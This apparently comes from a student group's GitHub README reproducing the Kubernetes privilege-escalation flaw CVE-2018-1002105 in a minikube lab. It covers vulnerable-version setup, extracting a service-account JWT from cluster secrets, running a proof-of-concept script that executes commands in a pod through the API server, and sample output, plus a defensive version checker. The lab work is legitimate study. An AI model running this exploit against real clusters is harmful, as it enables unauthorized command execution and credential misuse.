sh-ubh / CVE-2018-1002105

CMPT733-Group11(0x90)

CVE-2018-1002105

Members: Abhishek Rungta, Shubham Saini, Siddhant Sood

Environment Setup

  • A Linux VM (such as Ubuntu 20.04)
  • Minikube for local deployment of Kubernetes
  • Any of these older Kubernetes versions (1.0.x-1.9.x, 1.10.0-1.10.10, 1.11.0-1.11.4, 1.12.0-1.12.2)
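
To check whether a cluster falls inside the version ranges listed above, the following added example (not part of this repository's code) reads the server version from `kubectl version --short` output and compares it against those ranges. The function names and the sample output are assumptions made for illustration; vendor builds may carry backported fixes, so a match is a first-pass result only.

```python
import re

# Highest affected patch release per minor line, from the ranges listed above
# (1.10.0-1.10.10, 1.11.0-1.11.4, 1.12.0-1.12.2); all of 1.0.x-1.9.x is affected.
LAST_AFFECTED_PATCH = {10: 10, 11: 4, 12: 2}
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc))?")


def parse_version(text):
    """Return (major, minor, patch, prerelease) from e.g. 'v1.12.2' or
    'v1.10.11-gke.1'. Vendor suffixes are ignored; prerelease is True only
    for -alpha/-beta/-rc builds, which precede the release they name."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Kubernetes version found in {text!r}")
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    return major, minor, patch, m.group(4) is not None


def is_affected(version):
    """True if the version falls inside the affected ranges listed on this page."""
    major, minor, patch, prerelease = parse_version(version)
    if major != 1:
        return False
    if minor <= 9:
        return True
    last = LAST_AFFECTED_PATCH.get(minor)
    if last is None:
        return False
    # Assumption (conservative): a pre-release of the next patch after the
    # listed range, e.g. 1.12.3-beta.0, sorts before it and is flagged too.
    return patch <= last or (prerelease and patch == last + 1)


def server_version(kubectl_output):
    """Pick the API server version out of `kubectl version --short` output;
    the server version is the one that matters, not the kubectl client's."""
    for line in kubectl_output.splitlines():
        if line.lower().startswith("server version:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("no 'Server Version:' line in input")


# Constructed sample output for a cluster running v1.12.2.
SAMPLE = "Client Version: v1.18.0\nServer Version: v1.12.2\n"

if __name__ == "__main__":
    v = server_version(SAMPLE)
    print(v, "affected" if is_affected(v) else "not in the listed ranges")
```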

Run the exploit

We have provided a VirtualBox image (.ova file). Download it and create a VM from it. The OVA provided is preconfigured with Docker v18.09 and minikube v1.9.0.

OVA link

Build the kubernetes cluster

As our virtual image already has minikube and the required Kubernetes versions, just run the following command to start minikube:

minikube start --kubernetes-version=v1.12.2

Create new user, namespace and assign role

Create a new user and a namespace, and assign an RBAC role to the new user, using the following command:

kubectl apply -f fixing_policy.yml

Remove access to conntrack

kubectl edit configmaps kube-proxy --namespace=kube-system

Set maxPerCore to 0.

Get the JWT token

First, run the following command to get all the JWT tokens stored in the system:

kubectl get secrets -A

To get the secret of the user created earlier, run the following command:

kubectl -n [namespace] get secrets [user-token] -o json

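Then base64-decode the token value from the JSON output.

# Replace [base64-token] with the value of the "token" field under "data"
export TOKEN=$(echo "[base64-token]" | base64 -d)
echo "$TOKEN"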

Get the IP address and port number

kubectl cluster-info

To deploy the pod

kubectl run --image=nginx:alpine securenginx -n poc

Run the POC

Specify all the required arguments:
-t for the target ip:port (required)
-j for the JWT token of the user (required)
-p for pod (required)
-n for the namespace
-m for the method (required)
-c for the container
-x for the attacker command

Test case

Input

./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

Output

eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

Video Demo

Demo video link

About

License: MIT License